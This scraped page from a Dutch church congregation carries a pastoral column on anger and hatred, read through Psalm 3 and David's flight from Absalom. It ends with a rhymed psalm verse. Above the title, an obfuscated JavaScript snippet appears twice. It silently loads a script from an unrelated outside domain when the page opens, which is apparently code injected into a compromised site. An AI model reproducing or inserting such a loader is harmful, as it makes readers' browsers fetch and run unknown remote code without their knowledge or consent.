;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Haat - PKN Damwâld

Haat

Gepubliceerd op: woensdag 14 oktober 2020

Ben je wel eens boos? Schuilt er ergens haat in je? Wanneer je onrecht wordt aangedaan kan de boosheid zo maar opvlammen. Al is het dan de vraag of de boosheid terecht of niet terecht is (denk aan Gods vraag aan Jona: is het terecht dat je zo kwaad bent? Jona 4,4). Bij de één vlamt de boosheid er makkelijk uit en bij een ander wordt het diep begraven en smeult het door, soms jaren lang.
Het bijzondere is dat de Bijbel ons woorden geeft om boosheid te uiten. “Sta op, HEER, en red mij, God, sla mijn vijanden in het gezicht, breek de tanden van de wettelozen” (Psalm 3,8).

Je kan je dan afvragen: mag je dit wel mee bidden? Of moeten we juist het onrecht maar over ons heen laten gaan en de andere wang toe keren?

Wanneer je Psalm 3 leest is het van belang om te weten, dat het recht dus niet in eigen hand genomen wordt. David, de schrijver van deze psalm, slaat niet zelf de tanden uit de mond van de wettelozen maar vraagt of God het wil doen. David legt het onrecht bij God neer en laat het oordeel aan Hem over (ook al heeft David wel een voorstel hoe het oordeel er uit zou moeten zien).

Achter boosheid schuilt vaak intens verdriet. Ook in Psalm 3 horen we de hartekreet van David. Veel mensen hebben weinig hoop voor David en zeggen: “Hij vindt geen hulp bij God” (vers 3). De achtergrond van deze psalm is dat David op de vlucht is voor zijn zoon Absalom die een revolutie is begonnen en de macht heeft gegrepen. Gaat het nog goed komen of staat God aan de kant van de sterkste?

Toch weet David wie de Here is voor hem: “Maar Gij, Here, zijt een schild dat mij dekt, mijn eer, en die mijn hoofd opheft” (vers 4). God is een schild Die beschermt in een onveilige tijd. God is de eer voor David in een tijd dat heleboel David verachten en te schande maken. God richt David weer op terwijl David gebogen gaat onder veel zorgen.

Er kunnen heel wat verschillende redenen zijn om boos te worden. Boosheid tegen huiselijk geweld, of door onrecht bij het werk of op school. Boos om de maatregelen van de overheid. In een familie kan er soms veel boosheid zijn. Het is soms nodig dat de hulp van politie of overheid ingezet wordt. Boosheid rooft veel energie. Gelukkig laat de Bijbel zien dat we onze boosheid ook bij de Here mogen brengen. Jezus Christus is onze Advocaat (Rom.8,34). Hij leed onrecht voor ons en tegelijk liet Hij onrecht niet zo maar toe, bijvoorbeeld bij de reiniging van de tempel (Mt.21,12v). Wanneer onze eer verbrijzeld wordt is de Heer onze eer.

Die onze boeien slaakt, het is de Heer.

Die voor de vrijheid waakt, het is de Heer.

Door zijn verlossing zijn wij vrijgemaakt.

Ons heil is in de naam van God de Heer,

die God, die aard’ en hemel heeft gemaakt.

Ps. 124 vers 4 berijmd

Columnist:Ds. Otter

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns